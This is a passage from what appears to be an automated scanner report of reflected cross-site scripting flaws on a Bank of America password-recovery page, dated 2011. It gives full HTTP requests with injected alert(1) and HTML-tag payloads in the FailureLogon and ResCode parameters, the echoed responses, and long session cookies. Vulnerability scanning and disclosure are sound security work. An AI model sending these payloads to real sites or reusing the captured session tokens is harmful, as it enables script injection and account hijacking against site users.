ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; cmRS=&t1=1317910589971&t2=1317910592671&t3=1317910671003&t4=1317910588513&lti=1317910671003&ln=Submit_Forgotten_User_ID_or_Password_Request_IN_IForgotMyUserID&hr=javascript%3ASubmit%20Forgotten%20User%20ID%20or%20Password%20Request&fti=1317910670997&fn=InsToolProtectionPrivAsstForgotUsrIDPassEnterData_frmForgottenUserID%3A0%3B&ac=0:S&fd=0%3A3%3AtxtLName%3B0%3A4%3AtxtSSN%3B0%3A5%3AtxtZipCode%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_ForgottenUserID.asp&pi=Ins%3ATool%3AProtection%3APrivAsst%3AForgotUsrIDPass%3BEnterData&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22915
Content-Type: text/html
Expires: Thu, 06 Oct 2011 14:25:18 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:25:18 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "NotFound=Yese1cbc"-alert(1)-"f10bb05ef0e";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else
{
...[SNIP]...

1.21. https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp [FailureLogon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_iforgotmyuserid.asp

Issue detail

The value of the FailureLogon request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc0e"><a>4fbc292cb84 was submitted in the FailureLogon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserIDafc0e"><a>4fbc292cb84&ResCode=-34 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1726259115.281.0000; throttle_value=72; cmRS=&t1=1317909384320&t2=1317909389532&t3=1317909391486&t4=1317909383454&lti=1317909391485&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=&fn=frmLogon%3A0%3B&ac=&fd=&uer=&fu=&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23060
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:58:36 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:58:36 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_IN_IForgotMyUserID.asp" href="https://privacyassist.bankofamerica.com/home.asp?FailureLogon=WrongUserIDafc0e"><a>4fbc292cb84&ResCode=-34">
...[SNIP]...

1.22. https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp [FailureLogon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_iforgotmyuserid.asp

Issue detail

The value of the FailureLogon request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c05a3"-alert(1)-"0b59dc3b0cf was submitted in the FailureLogon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserIDc05a3"-alert(1)-"0b59dc3b0cf&ResCode=-34 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1726259115.281.0000; throttle_value=72; cmRS=&t1=1317909384320&t2=1317909389532&t3=1317909391486&t4=1317909383454&lti=1317909391485&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=&fn=frmLogon%3A0%3B&ac=&fd=&uer=&fu=&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23116
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:59:05 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:59:04 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "FailureLogon=WrongUserIDc05a3"-alert(1)-"0b59dc3b0cf&ResCode=-34";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}

...[SNIP]...

1.23. https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp [FailureLogon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_iforgotmyuserid.asp

Issue detail

The value of the FailureLogon request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb90'-alert(1)-'f422c5cedbd was submitted in the FailureLogon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserIDacb90'-alert(1)-'f422c5cedbd&ResCode=-34 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1726259115.281.0000; throttle_value=72; cmRS=&t1=1317909384320&t2=1317909389532&t3=1317909391486&t4=1317909383454&lti=1317909391485&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=&fn=frmLogon%3A0%3B&ac=&fd=&uer=&fu=&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23116
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:59:13 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:59:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Forgotten User ID or Password</title>

<meta name="descrip
...[SNIP]...
<!--
                           var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?FailureLogon=WrongUserIDacb90'-alert(1)-'f422c5cedbd&ResCode=-34';
                           strHref = strHref.toLowerCase()
                           if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 )
                           {
...[SNIP]...

1.24. https://privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp [ResCode parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_iforgotmyuserid.asp

Issue detail

The value of the ResCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d9e"><a>8919691e5db was submitted in the ResCode parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/IN_iforgotmyuserid.asp?FailureLogon=WrongUserID&ResCode=-3470d9e"><a>8919691e5db HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; 